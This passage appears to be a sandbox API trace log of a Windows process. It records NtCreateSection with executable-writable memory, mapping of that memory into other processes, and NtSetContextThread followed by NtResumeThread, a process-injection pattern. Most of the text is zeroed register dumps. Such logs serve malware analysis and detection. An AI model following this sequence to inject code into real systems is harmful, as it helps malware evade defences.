[411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0170.072] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0170.072] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0x105200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0x106000) returned 0x0 [0170.085] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xb4, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0x105200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x600000, SectionOffset=0x0, ViewSize=0xde6e8*=0x106000) returned 0x0 [0170.151] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0170.159] NtClose (Handle=0x140) returned 0x0 [0170.163] NtSetContextThread (ThreadHandle=0x138, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x5d5000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x672707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0170.177] NtResumeThread (in: ThreadHandle=0x138, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0170.177] NtClose (Handle=0xb4) returned 0x0 [0170.177] NtClose (Handle=0x138) returned 0x0 [0170.178] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x1008, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x138) returned 0x0 [0170.178] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0170.178] NtQueryInformationProcess (in: ProcessHandle=0x138, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0170.178] NtReadVirtualMemory (in: ProcessHandle=0x138, BaseAddress=0x271000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0170.179] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0170.255] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x100c) | out: ThreadHandle=0xdea64*=0xb4) returned 0x0 [0170.255] NtSuspendThread (in: ThreadHandle=0xb4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0170.256] NtMapViewOfSection (in: SectionHandle=0xc4, ProcessHandle=0x138, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2100000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0170.269] NtGetContextThread (in: ThreadHandle=0xb4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x271000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7567895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0170.281] NtCreateSection (in: SectionHandle=0xde6ec, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xde6ac, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xde6ec*=0x140) returned 0x0 [0170.282] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0xffffffff, BaseAddress=0xde6f4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6ac*=0xbe200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f4*=0x7300000, SectionOffset=0x0, ViewSize=0xde6ac*=0xbf000) returned 0x0 [0170.289] NtMapViewOfSection (in: SectionHandle=0x140, ProcessHandle=0x138, BaseAddress=0xde6f0*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde6e8*=0xbe200, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xde6f0*=0x5f0000, SectionOffset=0x0, ViewSize=0xde6e8*=0xbf000) returned 0x0 [0170.307] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x7300000) returned 0x0 [0170.310] NtClose (Handle=0x140) returned 0x0 [0170.310] NtSetContextThread (ThreadHandle=0xb4, Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x271000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x61b707, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, 